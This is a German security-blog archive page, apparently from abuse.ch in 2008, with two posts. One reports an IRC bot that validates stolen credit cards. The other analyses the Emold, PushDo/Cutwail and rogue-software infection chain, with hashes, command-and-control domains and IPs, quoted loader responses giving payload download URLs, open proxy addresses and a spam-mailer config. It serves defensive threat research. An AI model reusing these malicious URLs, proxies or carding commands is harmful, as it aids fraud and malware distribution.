Monthly Archive for October, 2008

Page 4 of 5

Bot validiert Kreditkartennummern

Seit einiger Zeit beobachte ich nun bereits ein IRC-Netzwerk, welches ein Tummelplatz für Hacker und Script Kiddies ist. Im Netzwerk kontrollieren Hacker und Script Kiddies ihre Heere von gehackten Webservern um diese für DDoS-Angriffe oder oder andere illegalen Aktivitäten einzusetzen.

Nun regt sich etwas neues im dem Netzwerk: Seit kurzem tummelt sich im Netzwerk ein Bot namens ChkBot, bei welchem die Channeluser Kreditkartennummern von Mastercard, Visa und American Express (AmEx) überprüfen (sprich validieren) lassen können:

<&ChkBot>Usage: !chk CardNumber CardExpire Cvv

Für die Überprüfung der Kreditkarten Informationen benötigt der Bot die Kreditkarten Nummer, das Ablaufdatum (CardExpire) sowie die Prüfziffer der Karte (cvv). Das ganze sieht dann so aus (Mitschnitt aus dem Channel):

<&Vladimiri> !chk 452088********** 0*** 2**
<&ChkBot> Checking 452088********** Please wait…..
<&ChkBot> (Visa) 452088********** 0*** 2** (VALID – APPROVED) – BANK: THE_TORONTO-DOMINION_BANK|CREDIT|CLASSIC|CANADA|

oder

<&Vladimiri> !bank 52622***********
<&ChkBot> (MasterCard) 52622*********** (VALID – APPROVED) – BANK: CITIBANK_SOUTH_DAKOTA,_N.A.|UNITED_STATES_OF_AMERICA

Die Kreditkarten-Nummern reichen von Karten aus der USA und Canada bis hin zu Frankreich, England, Spanien, Deutschland und Russland. Der Bot versteht laut Beschrieb folgendes Kommando:

!chk is command to chek yours Creditcard (cc) valid or not. It’s try to check your card with amount $100.00
The output off !chk cmd are:
- DECLINED Your card is declined.
- VALID – AVS Your card is valid, But the address was wrong.
- VALID – APPROVED Your card is valid, And that could be used to any address.

Noch ungewiss ist, woher die Kriminellen die Kreditkarten Nummern haben. Viel Auswahl bleibt da wohl kaum (Phishing / Keylogger). Auch interessant wäre es zu wissen, für was die Kreditkartennummern gebraucht werden. Nicht selten werden diese nämlich weiter verkauft oder für die Registrierung von Spammer- oder Malware-Domains verwendet.

UPDATE 16.10.08

Scheinbar sind auch Kreditkartennummern aus der Schweiz betroffen. Entsprechende Kartennummern von Mastercard wurden heute im Channel von einem User angefragt und vom Bot validiert.

UATelecom: WSNPoem, Emold und Cutwail

Auch heute ist Emold (aka AutoRun) wieder unterwegs. E-Mail sowie der Name des Attachement sind die Selben wie bei der Spam-Welle vom 25. August 2008 (Siehe Post “Trojan.Crypt: Fees_2008-2009.zip“). Im Attachement befindet sich heute jedoch eine aktuellere Variante des Trojaners Emold:

Filename: Fees_2008-2009.doc.exe
File size: 32768 bytes
MD5…: 7d743c8c9e6a12421dd34f616c086a81
SHA1..: cd618143164c88ca3ff73d3acc18afcb43bc9980
Erkennungsrate: 11/36 (30.56%)

Der Trojaner hat scheinbar die URLs gewechselt, bei welchen er sich jeweils das aktuelle Config-File holt:

dsxc.ru (211.95.79.241)
furely.ru (91.203.93.31)
gradul.ru (91.203.93.31)
hedym.ru (91.203.93.31)
joksh.ru (91.203.93.31)
kexlup.ru (211.95.79.241)
listaz.ru (89.187.48.249)
mjkm.ru (89.187.48.249)
nmli.ru (89.187.48.249)
okla.ru (89.187.48.249)

Interessant sind wie immer die Bemerkungen von Spamhaus:

IP address: 89.187.48.249
Ref: SBL65525, SBL67259

89.187.32.0/19 is listed on the Spamhaus Block List (SBL)
03-Oct-2008 19:10 GMT | SR04
bendery.md: spammer/cybercrime hosting (escalation)

Totally spam/cybercrime dirty or selling off IP space to Russian/Ukrainian crime/spam gangs.

Russian/Ukrainian cybercrime? Da werden Erinnerungen an WSNPoem wach.
Durchaus interessanter ist jedoch die IP Adresse 91.203.93.31, sie gehört nämlich der UATelecom, welche uns durch das Hosting von WSNPoem Domains sehr wohl bekannt ist (Siehe Post “Hinter den Kulissen von wsnpoem”). Die IP Adresse liegt ebenso im selben Subnet wie die durch WSNPoem bekannten IPs. Auch der dazugehörige Spamhaus Eintrag SBL67259 ist uns bereits von WSNPoem bekannt (Siehe Post “wsnpoem: IPLOGS.zip”):

IP address: 91.203.93.31
Ref: SBL65512

91.203.92.0/22 is listed on the Spamhaus Block List (SBL)
09-Aug-2008 23:25 GMT | SR04

Virus writers, malware spreaders, C&C servers

Es stellt sich also erneut der Verdacht, dass die UATelecom ein rentables Geschäft mit Bulletproof hosting betreibt.

Richtig interessant wird es jedoch erst jetzt:

Das von der Malware aufgerufene Script (z.B. http://furely.ru/load2/ld.php) gibt dem infizierten Rechner an, wo er noch weiteren Schadcode nachladen soll.

www.ecotopo.com.au (202.191.62.103)
www.econocorp.com (207.217.125.50)

lspr.exe

Beim ersten Aufruf des Scripts ld.php gibt der Server folgende Antwort zurück:

653|1 d http://www.ecotopo.com.au/images/lspr.exe http://www.econocorp.com/images/lspr.exe

Dieses File wird nun durch Emold heruntergeladen und ausgeführt. Bei dem File handelt es sich um den Trojaner PushDo (aka Wigon), welcher zusammen mit dem Spam-Mailer Cutwail (aka Pandex) im Handgepäckt kommt:

Filename: lspr.exe
File size: 23040 bytes
MD5…: 0d1906f9157962d5d2235e803e392720
SHA1..: d101d9e62b1fdfc272cdd8336684ae433833c2ee
Erkennungsrate: 8/36 (22.23%)

Der nachgeladene Trojaner erstellt dabei die Datei rs32net.exe im System32 Verzeichnis:

C:\WINDOWS\system32\rs32net.exe

Nun versucht Cutwail sich bei seinen Autoren zu melden. Dabei klappert er eine Liste von IP Adressen ab:

208.66.194.323
216.195.55.50
209.66.122.238
91.203.92.7
208.66.195.15
208.66.195.71

Interessant ist, dass Cutwail die IP Adresse 91.203.92.7 ansteuert. Und wo liegt diese IP Adresse? Genau: Im Subnet 91.203.92.0/22 der UATelecom!

kashi.exe

Nun ruft Emold ein zweitesmal das Script ld.php auf und bekommt prompt erneut eine Antwort zurück:

653|1 d http://www.ecotopo.com.au/images/kashi.exe http://www.econocorp.com/images/kashi.exe

Auch dieses File enthält Malware:

Filename: kashi.exe
File size: 44032 bytes
MD5…: 15113ee714454f223a169fde831e4d15
SHA1..: 50b089816368a7ca4e52c3c2346125b9575e6fe2
Erkennungsrate: 16/36 (44.45%)

Bei dem File handelt es sich um Rogue Software. Nach der Installation veranlasst diese einen Neustart von Windows.

rep.exe

Jetzt ruft Emold ein drittes mal das Script ld.php auf und bekommt noch ein drittes File zugeschoben:

653|1 d http://www.ecotopo.com.au/images/rep.exe http://www.econocorp.com/images/rep.exe

Auch diese Datei enthält wiederum eine Malware:

Filename: rep.exe
File size: 86016 bytes
MD5…: a217cdb07aa1bc2dad954dd2bd30f52c
SHA1..: c1613eebea3105bb9cc22787e89c7f58b45ff916
Erkennungsrate: 20/36 (55.56%)

Die Malware erstellt dutzende DLL- und EXE-Dateien im WINDOWS sowie im system32 Verzeichnis:

C:\WINDOWS\system32\ahspqvkd.exe
C:\WINDOWS\system32\joproxy.sll
C:\WINDOWS\system32\mwin32.exe
C:\WINDOWS\system32\sncntr.exe
C:\WINDOWS\FVProtect.exe
C:\WINDOWS\userconfig3x.dll
uvm.

ecotopo.com.au

Wer dachte, dass sei alles, irrt sich.
Beim Recherchieren bin ich nämlich auf eine interessante Entdeckung gestossen. Der Webserver, welche die Domain ecotopo.com.au hostet, ist so konfiguriert, dass er Directory Listing zulässt. Somit kommen interessante Dateien zum Vorschein:

Die Datei links.txt enthält zum Beispiel 120 gehackte Webserver, auf welchen sich nun sogenannte “redirections” befindet:

z.B.

META HTTP-EQUIV=”Refresh” CONTENT=”0; URL=http://sexopornik.com/”

Die Redirections sind unterschiedlich. Ein Paar versuchen sogar, dem Besucher mittels Iframes Malware unterzujubeln (Drive-By infection). Interessant ist jedoch folgende URL:

http://75.126.217.157/~thevoice/ivohc/

Die URL enthält einen Iframe, welcher zur Domain life-tablets.cn zeigt. Diese Domain ist uns bereits von früher bekannt. Sie verteilt nämlich (wie könnte es anders sein) den Trojaner WSNPoem per drive-by infektion (Siehe Post “wsnpoem per DriveBy-Infektion”).

Ein weiteres File Namens mailbase.txt führt 30’042 E-Mail Adressen auf, darunter auch eine E-Mail Adresse der Schweizerischen Post, der Postfinance, des CERN sowie der SBB.

Ebenfalls im root directory sind zwei webbasierte Spam-Mailer abgelegt:

Im der Datei proxy.txt befindet sich eine Liste von offenen Proxy Servern:

85.176.187.227:22277
75.176.186.191:47596
68.88.195.103:28512
208.77.179.192:63748
24.214.183.83:13226
96.3.124.97:31209
204.210.185.43:35114
71.128.249.121:13614
70.171.19.5:53137
uvm.

Interessant ist das Config File config.txt eines Spam-Mailers:

# Aaca E-MAIL aa?ania
MAILBASE=mailbase.txt

# Nienie aey FROM
FROM=from.txt

# Nienie aey REPLY-TO
REPLYTO=replyto.txt

# Nienie aey SUBJECT
SUBJECT=subject.txt

# Nienie ienai
LETTER=letter.txt

# Nienie aooa?iaioia
ATTACH=attach3446676856.txt

# Nienie SOCKS i?iene
PROXY=proxy789456787895656.txt
[...]

Schaut man sich die involvierten Dateien an, kommt man schnell zum Schluss, dass der Spam-Mailer gebraucht wird/wurde um Spam-Mails zu versenden, welche die Marke “European Phamracy” bzw. “Canadian Pharmacy” umwerben (Siehe “Spamtrackers.eu: European Pharmacy”).

Im Ordner halifax_LogIn befindet sich ausserdem noch eine Phishing Seite für die Englische Bank Halifax.

Fazit

Wieder einmal mehr wird die Schlucht zwischen Emold und WSNPoem kleiner.
Des Weiteren zeigt es sich erneut, dass die UATelecom in eine Vielzahl illegaler Aktivitäten im Internet (cybercrime) verwickelt ist. Nicht nur WSNPoem scheint einige Server in dem Subnet zu kontaktieren sondern auch Emold und Cutwail. Aus diesem Grund sollten Unternehmen es in Betracht ziehen, sämtliche Kommunikation von und in den IP Range der UATelecom (AS44997: 91.203.92.0/22) an ihren Gateways zu unterbinden – sprich zu blockieren.

Weiterführende Links
abuse.ch: “Propaganda einmal anders”
abuse.ch: “wsnpoem per DriveBy-Infektion”
abuse.ch: “wsnpoem: IPLOGS.zip”
abuse.ch: “Hinter den Kulissen von wsnpoem”
abuse.ch: “Trojan.Crypt: Fees_2008-2009.zip”




economics-recluse
Scene
Urgent!